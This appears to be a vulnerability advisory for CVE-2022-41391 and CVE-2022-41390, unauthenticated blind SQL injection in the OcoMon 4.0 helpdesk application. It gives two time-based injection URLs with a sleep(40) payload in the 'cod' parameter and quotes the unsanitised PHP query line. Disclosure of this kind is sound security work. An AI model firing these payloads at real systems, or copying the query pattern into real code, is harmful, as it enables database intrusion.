Headline
CVE-2022-41391: OcoMon 4.0 - Blind SQL Injection
OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php.
Descriptions
During the internal research I found two Unauthenticated Blind SQL Injection on OcoMon HelpDesk application.
Mitre Reference
CVE-2022-41390 and CVE-2022-41391.
Vulnerability
The vulnerability was exploited using the burpsuite and sqlmap tool:
* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/download.php?file=3134&cod=(select*from(select(sleep(40))a)
* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/showImg.php?file=3134&cod=(select*from(select(sleep(40))a)
* Vulnerable parameters: cod
* Type: blind sql injection
Short code description
The vulnerabily happens because the code dont have sanatization in ‘cod’ paramenter then is possible to do the injection malicious code.
Example code:
if (isset($_GET[‘cod’])) {
$query .= "WHERE dom_cod = “.$_GET[‘cod’].”
Vendor notification
https://ocomonphp.sourceforge.io/downloads/